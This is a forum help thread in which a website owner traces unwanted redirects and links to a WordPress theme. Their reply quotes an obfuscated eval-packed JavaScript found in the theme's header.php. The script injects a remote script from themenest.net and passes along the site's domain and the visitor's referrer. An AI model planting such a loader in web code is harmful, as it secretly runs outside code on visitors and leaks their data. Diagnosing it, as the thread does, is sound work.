    Good Day

I just uploaded a Wordpress theme onto my Website webserver. Now I tested this theme on my home server before with no problems.

Since it has been on the webserver (at a trusted hosting company), I get url redirects to malicious sites when I am browsing though my website.

    Here is my site: http://evolutionof4.co.za

The malicious sites it links to are: themeforest.net, carolini.net amongst others.

I have scanned all my files on the webserver for malware (with avast), I have also scanned my site with Sucuri Security, but it did not pick up anything.

I don't think it is malware on MY PC, since I got the same problem from another PC on my LAN...

    Any help?

    Thank you

there is no obvious signs of malware or automatic redirects on your site
BUT there are links on the blog page to some other sites that have most likely been put in automatically by the theme that you are using

it is a common "trick" by many theme authors to insert hidden links or make a blog post that has the title converted to a link to their theme site so they get publicity for their themes.
the only cure is to use a different theme
    see http://www.blackhatworld.com/blackh...523601-owner-carolini-net-youre-dickhead.html for carolini.net advice

My advice is remove the theme that you are using & find a new clean theme and also check what other plugins have been installed. Many SEO plugins cause this behaviour

Moved to web development as this isn't a malware problem but a malicious or dodgy plugin or theme on the website and beyond help with the malware cleaners who can only help with your computer, not your website

Cool, thank you for your help. I think you are right, since I found the following code in header.php file: (See code below)

Also, so you advise against using SEO plugins on my site? Do they have a bad rep?

    <script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>

some SEO plugins work ( to a degree) and some are thinly disguised attempts to bump other sites by adding links
You will get lots of differing views here on their effectiveness, but using the SEO element of Jetpack is amongst the safest & reasonably effective way of doing it,
BUT content, content & more relevant & effective content is the only real way to get good search Engine rankings.
